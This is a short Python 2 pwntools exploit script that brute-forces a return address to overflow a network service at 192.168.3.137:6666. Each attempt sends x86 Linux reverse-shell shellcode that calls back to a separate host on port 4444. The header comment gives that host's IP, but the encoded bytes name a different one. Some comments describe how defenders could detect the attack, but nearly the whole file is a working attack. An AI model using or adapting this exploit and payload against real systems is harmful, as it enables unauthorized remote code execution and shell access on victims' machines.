# Python 2 only: uses the `print` statement and `str` literals as raw bytes
# (under Python 3 the `print` line is a syntax error and the string
# concatenation below would no longer produce bytes).
from pwn import *
import sys  # NOTE(review): `sys` is never referenced in this file
# gdb-peda
# shellcode generate x86/linux 4444 192.168.3.136
# Raw x86/Linux payload bytes taken verbatim from the header comment above;
# the comment's host/port claim is not verified here against the encoded bytes.
shellcode = (
    "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
    "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\xc0\xa8\x03\x80\x66\x68"
    "\x11\x5c\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
    "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
    "\x89\xe1\xb0\x0b\xcd\x80"
)
# One attempt per value of the lowest address byte (0x01..0xff): each
# iteration opens a fresh TCP connection to 192.168.3.137:6666, sends one
# fixed-layout message and closes without reading any reply, so success or
# failure of an individual attempt is never observed by this script.
#
# Defender's view: this loop produces a burst of up to 255 short-lived
# connections to the same port, each carrying 44 bytes of 'A', a 4-byte
# value differing only in its first byte, a run of 0x90 and the identical
# byte blob above -- an easy pattern to alert on from connection logs or a
# payload-content rule, and each attempt that misses will typically crash
# the listening process (watch for repeated service restarts/core dumps).
for x in range(1, 0xff+1):
    io = remote("192.168.3.137", 6666)
    # 4-byte little-endian value 0xbffffbXX; only XX varies per iteration.
    addr = chr(x)+"\xfb\xff\xbf"
    # Message layout: 44 filler bytes, then the 4-byte value, then
    # four 0x90 bytes, then the payload bytes.
    payload = "A"*44
    payload += addr
    payload += "\x90"*4+shellcode
    # u32() decodes the 4 bytes as little-endian, so this prints 0xbffffbXX.
    print "addr : " + str(hex(u32(addr)))
    io.sendline(payload)
    # Closed immediately: nothing is read back from the connection.
    io.close()